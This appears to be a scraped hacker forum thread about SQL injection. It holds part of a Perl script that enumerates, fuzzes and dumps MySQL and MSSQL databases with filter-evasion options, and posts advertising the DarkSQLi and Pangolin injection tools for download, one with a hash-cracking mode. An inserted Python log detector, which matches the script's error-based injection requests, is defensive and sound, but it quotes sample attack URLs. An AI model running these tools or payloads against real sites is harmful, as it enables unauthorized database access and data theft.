	 mysqlcount($mysql_count_target,$evasion);
}

if (defined($mysql_details_target))
{
     print "[+] MySQL database details\n\n" ;
     print "[+] Target : $mysql_details_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqldetails($mysql_details_target,$evasion);
}

if (defined($mysql_schema_target))
{
     print "[+] MySQL Schema Extractor details\n\n" ;
     print "[+] Target : $mysql_schema_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlschema($mysql_schema_target,$evasion);
}

if (defined($mysql_dump_target))
{
     if (!defined($sql_dump_column))
	 {
	     print "[!] Please Defind At Least A Column\n";
		 exit();
	 }
     elsif (!defined($sql_dump_table))
	 {
	     print "[!] Please Defind Table Name\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MySQL Data Dumper details\n\n" ;
         print "[+] Target : $mysql_dump_target\n" ;
         if ($evasion eq '/*')
	     {
	         print "[+] Evasion : /**/\n" ;
	     }
         elsif ($evasion eq '%20')
	     {
	         print "[+] Evasion : %20\n" ;
	     }
	     else
	     {
	         print "[+] Evasion : --\n" ;
			 $evasion = "--"
	     }
		 mysqldump($mysql_dump_target,$sql_dump_column,$sql_dump_table,$evasion);
	 }	 
}

if (defined($mysql_fuzz_table))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Tables Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_table\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzztable($mysql_fuzz_table,$evasion,$word_list);	 
	 }
}

if (defined($mysql_fuzz_column))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
     elsif(!defined($sql_dump_table))
     {
	     print "[!] Please Define A Table To Fuzz it's Columns\n";
		 exit();
     }	
	 else
	 {
	     print "[+] MySQL Columns Fuzzer\n\n" ;
         print "[+] Target : $mysql_fuzz_column\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfuzzcolumn($mysql_fuzz_column,$evasion,$word_list,$sql_dump_table);	 
	 }
}

if (defined($mysql_load_file))
{
     if(!defined($word_list))
     {
	     print "[!] Please Define A list of tables to load\n";
		 exit();
     }	 
	 else
	 {
	     print "[+] MySQL Load_File Fuzzer\n\n" ;
         print "[+] Target : $mysql_load_file\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mysqlfile($mysql_load_file,$evasion,$word_list);	 
	 }
}

if (defined($mssql_details_target))
{
	 print "[+] MsSQL DB Details\n\n" ;
     print "[+] Target : $mssql_details_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqldetails($mssql_details_target,$evasion);	 
}

if (defined($mssql_table_target))
{
	 print "[+] MsSQL Tables Extractor\n\n" ;
     print "[+] Target : $mssql_table_target\n" ;
	 if ($evasion eq '/*')
     {
         print "[+] Evasion : /**/\n" ;
     }
     elsif ($evasion eq '%20')
     {
         print "[+] Evasion : %20\n" ;
     }
     else
     {
         print "[+] Evasion : --\n" ;
		 $evasion = "--"
     }
	 mssqltable($mssql_table_target,$evasion);	 
}

if (defined($mssql_column_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Defind At Least A Table do Extract from\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Columns Extractor\n\n" ;
         print "[+] Target : $mssql_column_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqlcolumn($mssql_column_target,$evasion,$sql_dump_table);	 
	 }
}

if (defined($mssql_dump_target))
{
     if(!defined($sql_dump_table))
	 {
	     print "[!] Please Defind At Least A Table\n";
		 exit();
	 }
     elsif(!defined($sql_dump_column))
	 {
	     print "[!] Please Defind At Least A Column\n";
		 exit();
	 }
	 else
	 {
	     print "[+] MsSQL Data Dumper\n\n" ;
         print "[+] Target : $mssql_dump_target\n" ;
	     if ($evasion eq '/*')
         {
             print "[+] Evasion : /**/\n" ;
         }
         elsif ($evasion eq '%20')
         {
             print "[+] Evasion : %20\n" ;
         } 
         else
         {
             print "[+] Evasion : --\n" ;
			 $evasion = "--"
         }
	     mssqldump($mssql_dump_target,$evasion,$sql_dump_table,$sql_dump_column);	 
	 }
}
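Seen from the defender's side, the requests built by `mssqlcolumn` and `mssqldump` in the script above leave a stable shape in web server logs: `convert(int,(select top 1 ... not in (...)))`, with the keywords separated by `+`, `%20` or `/**/`. The Python sketch below is an added example and is not part of the posted script; the log lines are constructed, and the function names, addresses and paths are assumptions. It normalizes the three separator styles, matches the pattern, and reports clients whose `not in` list changes between requests.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; addresses, paths and table names are placeholders.
SAMPLE_LOG = r"""
198.51.100.7 - - [20/Oct/2009:10:00:01 +0000] "GET /item.asp?id=convert(int,(select+top+1+column_name+from+information_schema.columns+where+table_name='users'+And+column_name+not+in+('Ws65qd798sqd9878')));-- HTTP/1.1" 500 1210
198.51.100.7 - - [20/Oct/2009:10:00:02 +0000] "GET /item.asp?id=convert(int,(select/**/top/**/1/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='users'/**/And/**/column_name/**/not/**/in/**/('Ws65qd798sqd9878','id')));-- HTTP/1.1" 500 1214
198.51.100.7 - - [20/Oct/2009:10:00:03 +0000] "GET /item.asp?id=convert(int,(select%20top%201%20login%20from%20users%20where%20login%20not%20in%20('Ws65qd798sqd9878','admin','bob')));-- HTTP/1.1" 500 1198
203.0.113.20 - - [20/Oct/2009:10:00:04 +0000] "GET /search.asp?q=convert+int+to+varchar HTTP/1.1" 200 5321
""".strip().splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>.+) HTTP/\d\.\d"')
PROBE_RE = re.compile(
    r"convert\s*\(\s*int\s*,\s*\(\s*select\s+top\s+1\s+(?P<col>[\w.\[\]]+)\s+from\s+"
    r"(?P<src>[\w.\[\]]+)\s+where\s+.*?\bnot\s+in\s*\((?P<seen>[^)]*)\)")

def normalize(target):
    """Undo the script's three separator styles ('+', '%20', '/**/') before matching."""
    text = unquote_plus(target)                         # '+' and %20 become spaces
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # inline comments become spaces
    return re.sub(r"\s+", " ", text).lower()

def find_probe(line):
    """Return (ip, source, column, excluded_count) for a matching log line, else None."""
    m = LOG_RE.match(line)
    p = PROBE_RE.search(normalize(m.group("target"))) if m else None
    if not p:
        return None
    excluded = [v for v in p.group("seen").split(",") if v.strip()]
    return m.group("ip"), p.group("src"), p.group("col"), len(excluded)

def scan(lines):
    """Group probes per client; a changing exclusion list means values are being read out."""
    per_client = defaultdict(list)
    for hit in filter(None, map(find_probe, lines)):
        per_client[hit[0]].append(hit[1:])
    return {ip: {"requests": len(hits),
                 "sources": sorted({h[0] for h in hits}),
                 "extracting": len({h[2] for h in hits}) > 1}
            for ip, hits in per_client.items()}

if __name__ == "__main__":
    for ip, info in scan(SAMPLE_LOG).items():
        print(ip, info)
```

The match only works on logs that record the full query string. The script reads each value out of the conversion error text returned in the response, so parameterized queries and generic error pages remove what it depends on.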
10-20-2009, 08:06 PM   #9
Site administrator
 
M3hr@n.S
 
Join date: May 2009
Posts: 160
Thanks: 206
Thanked 418 Times in 99 Posts
DarkSQLi – Advance sql injection script and tool

An injection tool written in Python (MySQL only).

Code:
Usage: ./darkMySQLi.py [options]
Options:
  -h, --help           shows this help message and exits
  -d, --debug          display URL debug information

  Target:
    -u URL, --url=URL  Target url

  Methodology:
    -b, --blind        Use blind methodology (req: --string)
    -s, --string       String to match in page when the query is valid
  Method:
    --method=PUT       Select to use PUT method ** NOT WORKING
  Modes:
    --dbs              Enumerate databases           MySQL v5+
    --schema           Enumerate Information_schema (req: -D,
                       opt: -T)                      MySQL v5+
    --full             Enumerate all we can          MySQL v5+
    --info             MySQL Server configuration    MySQL v4+
    --fuzz             Fuzz Tables & Columns Names   MySQL v4+
    --findcol          Find Column length            MySQL v4+
    --dump             Dump database table entries  (req: -T,
                       opt: -D, -C, --start)         MySQL v4+
    --crack=HASH       Crack MySQL Hashs (req: --wordlist)
    --wordlist=LIS.TXT Wordlist to be used for cracking
  Define:
    -D DB              database to enumerate
    -T TBL             database table to enumerate
    -C COL             database table column to enumerate
  Optional:
    --ssl              To use SSL
    --end              To use   +  and -- for the URLS --end "--" (Default)
                       To use /**/ and /* for the URLS --end "/*"
    --rowdisp          Do not display row # when dumping
    --start=ROW        Row number to begin dumping at
    --where=COL,VALUE  Use a where clause in your dump
    --orderby=COL      Use a orderby clause in your dump
    --cookie=FILE.TXT  Use a Mozilla cookie file
    --proxy=PROXY      Use a HTTP proxy to connect to the target url
    --output=FILE.TXT  Output results of tool to this file
Attached files
File type: rar darkmysqli16.rar (14.0 KB, 166 views)
11-28-2009, 05:40 PM   #10
Active member
 
hadi85
 
Join date: Sep 2009
Posts: 160
Thanks: 35
Thanked 150 Times in 75 Posts
Pangolin – Automatic SQL injection

New version of Pangolin

A professional tool for injection.

It supports the following databases:
  • Oracle
  • MS SQL Server 2000
  • MS SQL Server 2005
  • Sybase
  • Access
  • Mysql
  • DB2
  • Informix

Download: [Only site members can see links]